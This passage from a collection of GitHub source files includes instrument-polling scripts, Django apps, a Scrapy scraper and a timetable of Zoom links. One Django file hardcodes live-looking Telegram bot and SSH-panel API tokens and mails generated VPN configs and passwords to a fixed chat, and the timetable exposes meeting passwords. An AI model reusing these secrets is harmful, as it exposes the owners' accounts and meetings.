nrp.write_str_with_opc('DISPlay:WINDow1:Trace:MARKer:SELection M1')  # Shows the marker in the trace\n
nrp.write_str_with_opc('CALCulate1:DMODe MARKer')  # Switch display mode to marker display (from info mode)\n\n
sleep(.01)\nx = 0\nwhile x < 1000:\n    level = nrp.query_str('CALCulate1:TRACe:MARKer1:YPOSition?')  # Request the marker level in dBm\n
    print('current measured level is ', level, ' dBm')\n    x += 1\n    if x == 5:  # stop after five readings\n        break\n
    nrp.write_str_with_opc('INITiate1:IMMediate')  # Re-arm the trigger (wait for a new event in single trigger mode)\n    sleep(1)\n","repo_name":"Rohde-Schwarz/Examples","sub_path":"Powersensors/Python/RsInstrument/RsInstrument_NRX_Trace_Trigger_Marker_Readout.py","file_name":"RsInstrument_NRX_Trace_Trigger_Marker_Readout.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"}
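The polling loop in the script above reads the marker value and then re-arms the single trigger for the next pass (the x == 5 break caps it at five readings despite the while x < 1000 header). A minimal sketch of the same arm-then-read pattern with the bound made explicit — the VISA resource string is hypothetical, the reading count is an assumption, and the SCPI commands are the ones used above:

from RsInstrument import RsInstrument

nrx = RsInstrument('TCPIP::192.168.0.10::hislip0', True, True)  # hypothetical instrument address
N_READINGS = 5  # assumed number of single-trigger readings

for _ in range(N_READINGS):
    nrx.write_str_with_opc('INITiate1:IMMediate')  # arm one single-trigger acquisition
    level = nrx.query_str('CALCulate1:TRACe:MARKer1:YPOSition?')  # marker level in dBm
    print('measured level:', level, 'dBm')
nrx.close()

This arms before each read; the original script instead re-arms after reading, which is equivalent once the first acquisition has been triggered by the instrument setup.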
+{"seq_id":"35020303883","text":"from django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom . import views\r\napp_name = 'my_project'\r\n
urlpatterns = [\r\n    path('', views.home),\r\n    path('download', views.download),\r\n    path('download/', views.downloaded, name=\"downloaded\"),\r\n
    # unreachable: 'download/' is already matched by the pattern above,\r\n    # so this route needs a distinct path to ever be hit\r\n
    path('download/', views.downloaded_audio, name=\"downloaded_audio\"),\r\n    path('download/done', views.done),\r\n]\r\n","repo_name":"rajPawarRmp/youdown","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"25559929056","text":"import math\n\ndef check(n):\n    k = math.sqrt(n)\n    if n < 2:\n        return False\n\n
    for i in range(2, int(k)+1):\n        if n % i == 0:\n            return False\n    return True\n\n
def solution(numbers):\n    answer = 0\n    for i in range(1, numbers+1):\n        if check(i):\n            answer += 1\n    return answer\n\n
print(solution(10))\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"2.프로그래머스lv1/숫자_소수찾기/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28117042900","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\n
import logging\nimport random\nfrom logging import getLogger\n\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\n
from selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n
from selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom googlegroup.user_agent import agents\n\n\n
class ProxyMiddleware(object):\n    \"\"\"\n    A downloader middleware that routes requests through a proxy server. The proxy\n
    URL is read from the PROXY_URL setting and attached to every outgoing request.\n\n    Methods\n    -------\n
    process_request(self, request, spider):\n        Attaches the configured proxy to the request's meta so the request is\n        routed through it.\n    \"\"\"\n\n
    def __init__(self, proxy_url):\n        self.logger = logging.getLogger(__name__)\n        self.proxy_url = proxy_url\n\n
    def process_request(self, request, spider):\n        request.meta['proxy'] = self.proxy_url\n        self.logger.info(\"request.meta: {}\".format(request.meta))\n\n
    @classmethod\n    def from_crawler(cls, crawler):\n        settings = crawler.settings\n        return cls(\n            proxy_url=settings.get('PROXY_URL')\n        )\n\n\n
class RandomUserAgentMiddleware(object):\n    \"\"\"\n    A class to randomly change the user agent in HTTP requests. It randomly chooses\n
    a user agent from a given list and configures it as a downloader middleware.\n\n    Methods\n    -------\n
    process_request(self, request, spider):\n        Randomly chooses a user agent from `agents` in user_agent.py,\n        and then uses it as the user agent of the HTTP request.\n    \"\"\"\n\n
    def __init__(self):\n        self.logger = logging.getLogger(__name__)\n\n
    def process_request(self, request, spider):\n        agent = random.choice(agents)\n        request.headers[\"User-Agent\"] = agent\n        self.logger.debug('Change UserAgent to ' + agent)\n\n\n
class SeleniumMiddleware:\n    \"\"\"A class that uses the Python package `Selenium` to mock a browser and crawl pages by controlling the browser. 
This download middleware is only enabled when `is_start` is set on Scrapy request's metadata.\n\n Methods\n -------\n process_request(self, request, spider):\n This function mock a browser and crawl pages by controlling the browser. First it wait for the page to crawl until fully loaded. Second it scroll down the page to load AJAX data by executing some Javascript codes. At last it return the loaded page source as Scrapy's Response for further processes.\n\n \"\"\"\n def __init__(self, timeout=None):\n self.logger = getLogger(__name__)\n self.timeout = timeout\n\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n\n self.browser = webdriver.Chrome(options=chrome_options)\n self.browser.set_window_size(1400, 700)\n self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n\n def __del__(self):\n self.browser.close()\n\n def process_request(self, request, spider):\n if request.meta.get('is_start') is True:\n\n self.logger.info(\"Headless Chrome is Starting\")\n try:\n self.browser.get(\"https://groups.google.com/forum/#!forum/alluxio-users\")\n wait = WebDriverWait(self.browser, 1000)\n wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'F0XO1GC-b-F')))\n\n elem = self.browser.find_element(By.XPATH, '//*[@class=\"F0XO1GC-b-F\"]')\n\n last_height = elem.get_attribute('scrollHeight')\n\n for i in range(30):\n self.browser.execute_script(\n \"document.getElementsByClassName('F0XO1GC-b-F')[0].scrollTo(0, document.getElementsByClassName('F0XO1GC-b-F')[0].scrollHeight)\")\n\n while elem.get_attribute('scrollHeight') == last_height:\n continue\n\n last_height = elem.get_attribute('scrollHeight')\n\n self.logger.info(\"Scrolling Executed\")\n\n return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n status=200)\n\n except TimeoutException:\n return HtmlResponse(url=request.url, status=500, request=request)\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(timeout=crawler.settings.get('SELENIUM_TIMEOUT'))\n","repo_name":"SKYSCRAPERS1999/MyCrawlings","sub_path":"googlegroup/googlegroup/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42701014666","text":"import os\n\n# Import our global defaults.\nfrom tally.conf.settings.default import *\n\n\n# Inherit from environment specific config.\nDJANGO_CONF = os.environ.get('DJANGO_CONF', 'default')\nif DJANGO_CONF != 'default':\n module = __import__(DJANGO_CONF, globals(), locals(), ['*'])\n for k in dir(module):\n locals()[k] = getattr(module, k)\n\n# Import local settings\ntry:\n from local_settings import *\nexcept ImportError:\n import sys, traceback\n sys.stderr.write(\"Warning: Can't find the file 'local_settings.py' \"\n \"in the directory containing %r.\" % __file__)\n sys.stderr.write(\"\\nFor debugging purposes, the exception was:\\n\\n\")\n traceback.print_exc()\n\n# Remove disabled apps.\nif 'DISABLED_APPS' in locals():\n INSTALLED_APPS = [k for k in INSTALLED_APPS if k not in DISABLED_APPS]\n\n MIDDLEWARE_CLASSES = list(MIDDLEWARE_CLASSES)\n\n for a in DISABLED_APPS:\n for x, m in enumerate(MIDDLEWARE_CLASSES):\n if m.startswith(a):\n 
MIDDLEWARE_CLASSES.pop(x)\n","repo_name":"Mapkin/tally","sub_path":"tally/conf/settings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2284364451","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, FileResponse\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom account.models import Profile, Account, Action, Server\nfrom django.core.files import File\nfrom django.utils import timezone\nimport datetime\nimport requests\nimport os\n\ncurrent_dir = os.getcwd()\n\ndef document_sender(chat_id, file, caption):\n\tapiToken = '6292864503:AAHSpBSym2NVJuubNdfmuUFCxf5z-i8Gpnc'\n\tapiURL = f'https://api.telegram.org/bot{apiToken}/sendDocument'\n\tfiles = {'document': open(file,'rb')}\n\tdata = {'chat_id': chat_id, 'parse_mode':'HTML', 'caption':caption}\n\tr = requests.post(apiURL, data=data, files=files, stream=True)\n\treturn r.json()\n\ndef create_ssh_config(username, password, expdate):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/adduser\"\n\n\tj = {'token': token, 'username': username, 'password': password, 'multiuser': '1', 'traffic': '50', 'type_traffic': 'gb', 'expdate': expdate}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef account_generator(profile, server, account_name):\n\tserver_ip = server.ir_ip\n\tfor i in os.listdir('{}/cli/{}'.format(current_dir, server_ip)):\n\t\tif i.startswith('cli_'):\n\t\t\tnone_name = i\n\t\t\tbreak\n\n\tglobal pas\n\tpas = ''\n\twith open('{}/cli/{}/pass.txt'.format(current_dir, server_ip), 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\tprint(line)\n\t\t\tif line.startswith(none_name):\n\t\t\t\tpas = line.split(' : ')[1]\n\n\tos.rename('{}/cli/{}/{}'.format(current_dir, server_ip, none_name), '{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name))\n\twith open('{}/cli/{}/{}.ovpn'.format(current_dir,server_ip, account_name), 'rb') as f:\n\t\tovpn_file = File(f)\n\t\tovpn_file = File(f, name=os.path.basename('{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name)))\n\t\taccount = Account(name=account_name, password = pas, file = ovpn_file, server = server, cli_name = none_name.split('.')[0], leader = profile)\n\t\taccount.save()\n\n\tcreate_ssh_config(account.name, account.password, account.date_end.strftime(\"%Y-%m-%d\"))\n\tdocument_sender('515098162', '{}/cli/{}/{}.ovpn'.format(current_dir, server_ip, account_name), pas)\n\n\taction = Action(leader = profile, action = 0, account = account)\n\taction.save()\n\ndef home(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofiles = Profile.objects.all()\n\t\t\tservers = Server.objects.all()\n\t\t\taccounts = Account.objects.all()\n\n\n\t\t\tadmin_accounts = Account.objects.filter(leader=get_object_or_404(Profile, user=request.user)).order_by('-date_end')\n\n\t\t\tcontext = { 'profiles': profiles,\n\t\t\t\t'servers': servers,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'admin_accounts': admin_accounts,\n\t\t\t}\n\n\n\t\t\treturn render(request, 'superadmin/home.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn 
redirect('account:login_view')\n\ndef admin_profile(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofiles = Profile.objects.all()\n\t\t\tservers = Server.objects.all()\n\t\t\taccounts = Account.objects.all()\n\n\t\t\tadmin_accounts = Account.objects.filter(leader=get_object_or_404(Profile, user=request.user)).order_by('-date_end')\n\n\t\t\tcontext = {'profiles': profiles,\n\t\t\t\t'servers': servers,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'admin_accounts': admin_accounts,\n\t\t\t}\n\t\t\treturn render(request, 'superadmin/manage.html', context = context)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef profile(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\taccounts = Account.objects.filter(leader=profile).order_by('-date_end')\n\t\t\taccounts_count = accounts.count()\n\t\t\tall_account = profile.count\n\t\t\taccounts_left = all_account - accounts_count\n\n\t\t\tservers = Server.objects.all()\n\n\t\t\ttoday = timezone.datetime.today().day\n\n\t\t\tcontext = {'profile': profile,\n\t\t\t\t'accounts': accounts,\n\t\t\t\t'accounts_count': accounts_count,\n\t\t\t\t'accounts_left': accounts_left,\n\t\t\t\t'today': today,\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/profile.html', context)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef change_server(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\tserver = get_object_or_404(Server, ir_ip=request.POST['server_shift'])\n\t\t\tprofile.server = server\n\t\t\tprofile.save()\n\t\t\treturn redirect('superadmin:profile', profile_id)\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef charge_coin(request, profile_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tprofile = get_object_or_404(Profile, id=profile_id)\n\t\t\tcoin_value = request.POST['charge_coin']\n\t\t\tprofile.count = int(coin_value)\n\t\t\tprofile.save()\n\t\t\treturn redirect('superadmin:profile', profile_id)\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef server(request, server_id):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tserver = get_object_or_404(Server, id=server_id)\n\t\t\tprofiles = Profile.objects.filter(server=server)\n\t\t\tcontext = {\n\t\t\t\t'server': server,\n\t\t\t\t'profiles': profiles,\n\t\t\t}\n\t\t\treturn render(request, 'superadmin/server.html', context)\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef create_account(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\taccount_name = request.POST['account_name']\n\n\t\t\ttry:\n\t\t\t\tget_object_or_404(Account, name=account_name)\n\t\t\t\tmessages.add_message(request, messages.INFO, 'This name already taken')\n\t\t\texcept:\n\t\t\t\tif account_name != \"\":\n\t\t\t\t\tserver = get_object_or_404(Server, ir_ip=request.POST['server_shift'])\n\t\t\t\t\tprofile = get_object_or_404(Profile, user=request.user)\n\n\t\t\t\t\taccount_generator(profile, server, account_name)\n\t\t\t\telse:\n\t\t\t\t\tmessages.add_message(request, messages.INFO, 'Chose somename and donnot leave it blank !')\n\n\t\t\treturn redirect('superadmin:admin_profile')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef 
test(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tun = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\n\t\t\tcn = request.POST['count']\n\t\t\tsi = request.POST['server_ip']\n\n\t\t\tprint(un, password, cn, si)\n\n\t\t\treturn redirect('superadmin:leader_creation')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef send_profile(request, account_id):\n\tif request.user.is_authenticated:\n\t\taccount = get_object_or_404(Account, id=account_id)\n\t\tprofile = get_object_or_404(Profile, user=request.user)\n\n\t\tdocument_sender(profile.chat_id, '{}{}'.format(current_dir, account.file.url), account.password)\n\n\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:profile')\n\ndef leader_creation(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tservers = Server.objects.all()\n\t\t\tcontext = {\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/leader_creation.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef create_profile(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tusername = request.POST['username']\n\t\t\tpassword = request.POST['password']\n\n\t\t\tcount = request.POST['count']\n\t\t\tserver_ip = request.POST['server_ip']\n\n\t\t\tuser = User.objects.create_user(username=username, password=password)\n\t\t\tuser.save()\n\n\t\t\tserver = get_object_or_404(Server, ir_ip=server_ip)\n\t\t\tprofile = Profile(user=user, count = int(count), server = server)\n\t\t\tprofile.save()\n\n\t\t\treturn redirect('superadmin:home')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef server_creation(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tservers = Server.objects.all()\n\t\t\tcontext = {\n\t\t\t\t'servers': servers,\n\t\t\t}\n\n\t\t\treturn render(request, 'superadmin/server_creation.html', context=context)\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\ndef create_server(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_superuser:\n\t\t\tserver_name = request.POST['server_name']\n\t\t\tir_ip = request.POST['ir_ip']\n\t\t\tfr_ip = request.POST['fr_ip']\n\n\t\t\tnext_server_ip = request.POST['next_server_ip']\n\t\t\tshift_server = get_object_or_404(Server, ir_ip=next_server_ip)\n\n\t\t\tserver = Server(name=server_name, ir_ip=ir_ip, fr_ip=fr_ip, next_server=shift_server)\n\t\t\tserver.save()\n\n\t\t\treturn redirect('superadmin:home')\n\t\telse:\n\t\t\treturn redirect('account:profile')\n\telse:\n\t\treturn redirect('account:login_view')\n\n\ndef activate_ssh_user(username):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/active\"\n\n\tj = {'token': token, 'username': username}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef deactivate_ssh_user(username):\n\ttoken = '1693053954X7H0C3M46ETKGSY'\n\turl = \"https://cofee.fdlock.xyz:1978/api/deactive\"\n\n\tj = {'token': token, 'username': username}\n\tx = requests.post(url, json=j)\n\treturn x\n\ndef reverse_ssh_status(request, server_id):\n\tserver = get_object_or_404(Server, id=server_id)\n\tnew_status = not server.ssh_status\n\n\tacc_list = Account.objects.filter(server=server)\n\tfor 
acc in acc_list:\n\t\tif new_status:\n\t\t\tactivate_ssh_user(acc.name)\n\t\telse:\n\t\t\tdeactivate_ssh_user(acc.name)\n\n\tserver.ssh_status = new_status\n\tserver.save()\n\n\treturn redirect('superadmin:server', server_id)\n","repo_name":"elephantishash/ovpn","sub_path":"superadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"275749693","text":"from django.contrib.humanize.templatetags.humanize import naturaltime\nfrom django.db.models import (\n CharField,\n DateTimeField,\n ForeignKey,\n IntegerField,\n ImageField,\n DecimalField,\n BooleanField,\n TextField,\n OneToOneField,\n ManyToManyField,\n FileField,\n Model,\n SlugField\n)\nfrom imagekit.processors import ResizeToFill\nfrom imagekit.models import ProcessedImageField, ImageSpecField\nfrom imagekit.processors import Transpose\nfrom tinymce.models import HTMLField\nfrom django.template.defaultfilters import slugify\n\n\ndef get_str(field):\n if field:\n return field\n else:\n return 'Created on {}.'.format(\n self.get_date())\n\n\ndef create_slug(self, slug_field, model):\n max_length = self._meta.get_field('slug').max_length\n slug = slugify(slug_field)[:max_length]\n original = slug\n\n for x in range(1, 1000):\n if not model.objects.filter(slug=slug).exclude(id=self.id).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n new_max_length = max_length - len(str(x)) - 1\n short_slug = original[:new_max_length]\n slug = \"{}-{}\".format(short_slug, x)\n return slug\n\ndef get_image(self):\n if self.image:\n return self.image.image.url\n else:\n return \"/static/enuda_mag/img/student.jpeg\"\n\n\ndef image_upload_location(instance, filename):\n return \"images/{}\".format(filename)\n\n\nclass IntegerRangeField(IntegerField):\n def __init__(self, verbose_name=None, name=None,\n min_value=None, max_value=None, **kwargs):\n self.min_value, self.max_value = min_value, max_value\n IntegerField.__init__(self, verbose_name, name, **kwargs)\n\n def formfield(self, **kwargs):\n defaults = {'min_value': self.min_value, 'max_value': self.max_value}\n defaults.update(kwargs)\n return super(IntegerRangeField, self).formfield(**defaults)\n\n\nclass TimeStampBaseModel(Model):\n\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. %B %Y %I:%M%p\")\n return date\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\n\nclass NameTimeStampBaseModel(Model):\n\n name = CharField(max_length=80, null=True, blank=True)\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. 
%B %Y %I:%M%p\")\n return date\n\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n if self.name:\n name = self.name\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\n\nclass HTMLContentBaseModel(Model):\n\n content = HTMLField(null=True, blank=True)\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. %B %Y %I:%M%p\")\n return date\n\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n if self.name:\n name = self.name\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\nclass Image(NameTimeStampBaseModel):\n # user = OneToOneField(User, related_name=\"image\", null=True, blank=True)\n # content_object = GenericForeignKey('content_type', 'object_id')\n image = ProcessedImageField(processors=[ # ResizeToFill(\n # 100, 50),\n Transpose()],\n upload_to=image_upload_location,\n null=True,\n blank=True,\n format='JPEG',\n options={'quality': 60})\n mid_size = ImageSpecField(source='image',\n processors=[ResizeToFill(750, 450)],\n format='JPEG',\n options={'quality': 60})\n thumbnail = ImageSpecField(source='image',\n processors=[ResizeToFill(80, 80)],\n format='JPEG',\n options={'quality': 60})\n my_namespace = CharField(\n default=\"\", max_length=128, null=True, blank=True)\n \n\n def get_timestamp(self, pretty=False):\n\n if pretty:\n return self.timestamp.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return self.timestamp.strftime(\"%Y-%m-%d_%H:%M:%S\")\n","repo_name":"KaluEmeKalu/enuda_house_world","sub_path":"enuda_mag/models_utils.py","file_name":"models_utils.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18233818303","text":"# -*- coding: utf-8 -*-\n# Author:jiang\n# 2021/8/24 15:49\nimport unittest\nimport sys\nprint(sys.path)\nsys.path.append(\"..\") #添加上一级路径\nprint(sys.path)\nfrom python.calc import Calc\n\nclass TestCal(unittest.TestCase):\n def test_add_1(self):\n self.calc=Calc()\n result=self.calc.add(1,2)\n self.assertEqual(3,result)\n print(result)\nunittest.main()","repo_name":"jiangdeping/PyTestProject","sub_path":"testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74370128054","text":"import json\nimport pprint\n\n\ntur = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Türkçe\")\nfen = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Fen ve Teknoloji\")\nmat = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", 
\"Matematik\")\ncommon = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"\")\neng = (\"https://us04web.zoom.us/j/9018960986?pwd=Qzk1Sm9kMmxId0NyNnVlR0hSbnRJdz09\", \"İngilizce\")\npe = (\"https://us04web.zoom.us/j/4324908469\", \"Beden Eğitimi\")\nlife = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Hayat Bilgisi\")\nrobot = (\"https://us04web.zoom.us/j/5609504756?pwd=MVMzTU8xaTlBV1U3Yjd1RzRVVHRPdz09\", \"Robotik Kodlama\")\nskills = (\"https://us04web.zoom.us/j/2937880883?pwd=MTVLTTdESTUvbzNIUHdmUVNDT3N3QT09\", \"Skills\")\nkuran = (\"https://us04web.zoom.us/j/4103999829\", \"Kuran\")\ngor = (\"https://us04web.zoom.us/j/3314303377\", \"Görsel Sanatlar\")\nmus = (\"https://us04web.zoom.us/j/4975962849\", \"Müzik\")\nvalue = (\"https://us04web.zoom.us/j/6868293773\", \"Değerler Eğitimi\")\n\nprograms = [\n [mat, fen, pe, eng, tur, kuran, tur],\n [tur, eng, skills, mat, life, tur, kuran],\n [mat, fen, life, mus, eng, tur, eng],\n [tur, robot, tur, eng, value, gor, mat],\n [fen, mat, tur, life, tur, eng, eng]\n]\n\n\nlectures = {\n \"Monday\": {1: programs[0][0][0], 2: programs[0][1][0], 3: programs[0][2][0], 4: programs[0][3][0], 5: programs[0][4][0], 6: programs[0][5][0], 7: programs[0][6][0]},\n \"Tuesday\": {1: programs[1][0][0], 2: programs[1][1][0], 3: programs[1][2][0], 4: programs[1][3][0], 5: programs[1][4][0], 6: programs[1][5][0], 7: programs[1][6][0]},\n \"Wednesday\": {1: programs[2][0][0], 2: programs[2][1][0], 3: programs[2][2][0], 4: programs[2][3][0], 5: programs[2][4][0], 6: programs[2][5][0], 7: programs[2][6][0]},\n \"Thursday\": {1: programs[3][0][0], 2: programs[3][1][0], 3: programs[3][2][0], 4: programs[3][3][0], 5: programs[3][4][0], 6: programs[3][5][0], 7: programs[3][6][0]},\n \"Friday\": {1: programs[4][0][0], 2: programs[4][1][0], 3: programs[4][2][0], 4: programs[4][3][0], 5: programs[4][4][0], 6: programs[4][5][0], 7: programs[4][6][0]}\n}\n\n\ndef dump():\n\n with open(\"docs/calendar.json\", \"w\") as file:\n\n json.dump(lectures, file, indent=2)\n\n\ndef load():\n\n with open(\"docs/calendar.json\", \"r\") as file:\n\n dic = json.load(file)\n\n pprint.pprint(dic)\n\n\n# dump()\n# load()\n","repo_name":"fatom98/Calendar","sub_path":"docs/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31337047883","text":"# naiveBayes.py\n# -------------\n# Licensing Information: Please do not distribute or publish solutions to this\n# project. You are free to use and extend these projects for educational\n# purposes. 
The Pacman AI projects were developed at UC Berkeley, primarily by\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and Pieter \n# Abbeel in Spring 2013.\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html\n\nimport util\nimport classificationMethod\nimport math\n\nclass NaiveBayesClassifier(classificationMethod.ClassificationMethod):\n \"\"\"\n See the project description for the specifications of the Naive Bayes classifier.\n\n Note that the variable 'datum' in this code refers to a counter of features\n (not to a raw samples.Datum).\n \"\"\"\n def __init__(self, legalLabels):\n self.legalLabels = legalLabels\n self.type = \"naivebayes\"\n self.k = 1 # this is the smoothing parameter, ** use it in your train method **\n self.automaticTuning = False # Look at this flag to decide whether to choose k automatically ** use this in your train method **\n\n def setSmoothing(self, k):\n \"\"\"\n This is used by the main method to change the smoothing parameter before training.\n Do not modify this method.\n \"\"\"\n self.k = k\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n \"\"\"\n Outside shell to call your method. Do not modify this method.\n \"\"\"\n\n # might be useful in your code later...\n # this is a list of all features in the training set.\n self.features = list(set([ f for datum in trainingData for f in datum.keys() ]));\n\n if (self.automaticTuning):\n kgrid = [0.001, 0.01, 0.05, 0.1, 0.5, 1, 2, 5, 10, 20, 50]\n else:\n kgrid = [self.k]\n\n self.trainAndTune(trainingData, trainingLabels, validationData, validationLabels, kgrid)\n\n def trainAndTune(self, trainingData, trainingLabels, validationData, validationLabels, kgrid):\n \"\"\"\n Trains the classifier by collecting counts over the training data, and\n stores the Laplace smoothed estimates so that they can be used to classify.\n Evaluate each value of k in kgrid to choose the smoothing parameter\n that gives the best accuracy on the 